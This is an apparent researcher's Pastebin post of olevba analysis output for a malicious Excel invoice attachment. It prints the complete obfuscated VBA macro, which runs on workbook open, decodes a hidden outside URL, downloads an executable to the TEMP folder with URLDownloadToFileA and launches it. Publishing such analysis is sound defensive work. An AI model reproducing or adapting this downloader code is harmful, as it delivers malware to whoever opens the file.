Advertisement
dynamoo

Malicious Excel macro

Mar 11th, 2015
557
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
 1. olevba 0.25 - http://decalage.info/python/oletools
 2. Flags       Filename                                                        
 3. ----------- -----------------------------------------------------------------
 4. OLE:MAS---- inv86-~1.xls
 5.  
 6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
 7.  
 8. ===============================================================================
 9. FILE: inv86-~1.xls
 10. Type: OLE
 11. -------------------------------------------------------------------------------
 12. VBA MACRO ÝòàÊíèãà.cls
 13. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
 14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 15. Sub Workbook_Open()
 16. atqk_x482mp6v
 17. End Sub
 18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 19. ANALYSIS:
 20. +----------+---------------+----------------------------------------+
 21. | Type     | Keyword       | Description                            |
 22. +----------+---------------+----------------------------------------+
 23. | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
 24. +----------+---------------+----------------------------------------+
 25. -------------------------------------------------------------------------------
 26. VBA MACRO Ëèñò1.cls
 27. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
 28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 29. (empty macro)
 30. -------------------------------------------------------------------------------
 31. VBA MACRO Ëèñò2.cls
 32. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
 33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 34. (empty macro)
 35. -------------------------------------------------------------------------------
 36. VBA MACRO Ëèñò3.cls
 37. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
 38. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 39. (empty macro)
 40. -------------------------------------------------------------------------------
 41. VBA MACRO Class1.cls
 42. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
 43. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 44. (empty macro)
 45. -------------------------------------------------------------------------------
 46. VBA MACRO Class2.cls
 47. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class2'
 48. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 49. (empty macro)
 50. -------------------------------------------------------------------------------
 51. VBA MACRO ÀàâïàâïÀÀ.bas
 52. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u0410\u0430\u0432\u043f\u0430\u0432\u043f\u0410\u0410'
 53. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 54.  
 55. Public Function tIBlTVqSYlvQeRDfBAc(VdkAbaqgjbz As String) As String
 56. For HFncwnerBk = 1 To Len(VdkAbaqgjbz) Step 2
 57. tIBlTVqSYlvQeRDfBAc = tIBlTVqSYlvQeRDfBAc & Mid(VdkAbaqgjbz, HFncwnerBk, 1)
 58. Next
 59. End Function
 60.  
 61. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 62. ANALYSIS:
 63. No suspicious keyword or IOC found.
 64. -------------------------------------------------------------------------------
 65. VBA MACRO Class3.cls
 66. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class3'
 67. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 68. (empty macro)
 69. -------------------------------------------------------------------------------
 70. VBA MACRO Class4.cls
 71. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class4'
 72. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 73. (empty macro)
 74. -------------------------------------------------------------------------------
 75. VBA MACRO Class5.cls
 76. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class5'
 77. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 78. (empty macro)
 79. -------------------------------------------------------------------------------
 80. VBA MACRO ûâàûâÀÀâà.bas
 81. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u044b\u0432\u0430\u044b\u0432\u0410\u0410\u0432\u0430'
 82. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 83. #If VBA7 Then
 84.     Private Declare PtrSafe Function ãøÏÍØûâàà Lib "urlmon" Alias _
 85.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
 86.     ByVal ÏÑðïñïñïïÎàï As String, _
 87.     ByVal ÏÑðïñïñïïÎàïf As String, _
 88.     ByVal ÏÑðïñïñïïÎàïfd As Long, _
 89.     ByVal ÏÑðïñïñïïÎàïfds As LongPtr) As LongPtr
 90. #Else
 91.     Private Declare Function ãøÏÍØûâàà Lib "urlmon" Alias _
 92.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
 93.     ByVal ÏÑðïñïñïïÎàï As String, _
 94.     ByVal ÏÑðïñïñïïÎàïf As String, _
 95.     ByVal ÏÑðïñïñïïÎàïfd As Long, _
 96.     ByVal ÏÑðïñïñïïÎàïfds As Long) As Long
 97. #End If
 98. Sub atqk_x482mp6v()
 99. ðïîðïÀàâïàâï tIBlTVqSYlvQeRDfBAc(Chr$(104) & Chr$(43) & Chr$(116) & Chr$(83) & Chr$(116) & Chr$(38) & Chr$(112) & Chr$(47) & Chr$(58) & Chr$(73) & Chr$(47) & Chr$(93) & Chr$(47) & Chr$(134) & Chr$(48) & Chr$(60) & Chr$(51) & Chr$(35) & Chr$(52) & Chr$(109) & Chr$(48) & Chr$(61) & Chr$(52) & Chr$(104) & Chr$(101) & Chr$(102) & Chr$(98) & Chr$(56) & Chr$(46) & Chr$(120) & Chr$(110) & Chr$(54) & Chr$(101) & Chr$(126) & Chr$(116) & Chr$(134) & Chr$(115) & Chr$(84) & Chr$(111) & Chr$(35) & Chr$(108) & Chr$(56) & Chr$(104) & Chr$(45) & Chr$(111) & Chr$(80) & Chr$(115) & Chr$(74) & Chr$(116) & Chr$(118) & Chr$(46) & Chr$(60) & Chr$(99) & Chr$(107) & Chr$(111) & Chr$(92) & Chr$(109) & Chr$(84) & Chr$(47) & Chr$(107) & Chr$(106) & Chr$(40) & Chr$(115) & Chr$(68) & Chr$(47) & Chr$(109) & Chr$(98) & Chr$(86) & Chr$(105) & Chr$(104) & Chr$(110) & Chr$(49) & Chr$(46) & Chr$(39) & Chr$(101) _
 100. & Chr$(96) & Chr$(120) & Chr$(99) & Chr$(101) & Chr$(62)), Environ(tIBlTVqSYlvQeRDfBAc(Chr$(84) & Chr$(96) & Chr$(77) & Chr$( _
 101. 109) & Chr$(80) & Chr$(123))) & tIBlTVqSYlvQeRDfBAc(Chr$(92) & Chr$(81) & Chr$(102) & Chr$(106) & Chr$(74) & Chr$(105) & Chr$(67) & Chr$(36) & Chr$(104) & Chr$(43) & Chr$(106) & Chr$(48) & Chr$(102) & Chr$(132) & Chr$(103) & Chr$(80) & Chr$(68) & Chr$(109) & Chr$(54) & Chr$(95) & Chr$(55) & Chr$(65) & Chr$(53) & Chr$(130) & Chr$(101) & Chr$(134) & Chr$(68) & Chr$(74) & Chr$(84) & Chr$(129) & Chr$(85) & Chr$(37) & Chr$(46) & Chr$(64) & Chr$(101) & Chr$(57) & Chr$(120) & Chr$(124) & Chr$(101) & Chr$(50))
 102.  
 103.  
 104. End Sub
 105. Function ðïîðïÀàâïàâï(z0ktwRXRQZl2qo0_ As String, d4ok1z1Z0N As String) As Boolean
 106. ïëðïÀÀàâïï = ãøÏÍØûâàà(0&, z0ktwRXRQZl2qo0_, d4ok1z1Z0N, 0&, 0&)
 107. Set ûâàÀÀâûàûâà = CreateObject(tIBlTVqSYlvQeRDfBAc(Chr$(83) & Chr$(99) & Chr$(104) & Chr$(99) & Chr$(101) & Chr$(52) & Chr$(108) & Chr$(68) & Chr$(108) & Chr$(92) & Chr$(46) & Chr$(46) & Chr$(65) & Chr$(84) & Chr$(112) & Chr$(44) & Chr$(112) & Chr$(91) & Chr$(108) & Chr$(125) & Chr$(105) & Chr$(75) & Chr$(99) & Chr$(125) & Chr$(97) & Chr$(47) & Chr$(116) & Chr$(35) & Chr$(105) & Chr$(71) & Chr$(111) & Chr$(38) & Chr$(110) & Chr$(82)))
 108.  
 109. ûâàÀÀâûàûâà.Open Environ(tIBlTVqSYlvQeRDfBAc(Chr$(84) & Chr$(51) & Chr$(77) & Chr$(71) & Chr$(80) & Chr$(83))) & tIBlTVqSYlvQeRDfBAc(Chr$(92) & Chr$(75) & Chr$(102) & Chr$(98) & Chr$(74) & Chr$(130) & Chr$(67) & Chr$(59) & Chr$(104) & Chr$(73) & Chr$(106) & Chr$(76) & Chr$(102) & Chr$(94) & Chr$(103) & Chr$(40) & Chr$(68) & Chr$(130) & Chr$(54) & Chr$(87) & Chr$(55) & Chr$(90) & Chr$(53) & Chr$(53) & Chr$(101) & Chr$(65) & Chr$(68) & Chr$(102) & Chr$(84) & Chr$(118) & Chr$(85) & Chr$(97) & Chr$(46) & Chr$(58) & Chr$(101) & Chr$(49) & Chr$(120) & Chr$(50) & Chr$(101) & Chr$(47))
 110. End Function
 111.  
 112.  
 113.  
 114.  
 115.  
 116. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 117. ANALYSIS:
 118. +------------+--------------------+-----------------------------------------+
 119. | Type       | Keyword            | Description                             |
 120. +------------+--------------------+-----------------------------------------+
 121. | Suspicious | CreateObject       | May create an OLE object                |
 122. | Suspicious | Lib                | May run code from a DLL                 |
 123. | Suspicious | Open               | May open a file                         |
 124. | Suspicious | Environ            | May read system environment variables   |
 125. | Suspicious | Chr                | May attempt to obfuscate specific       |
 126. |            |                    | strings                                 |
 127. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
 128. +------------+--------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement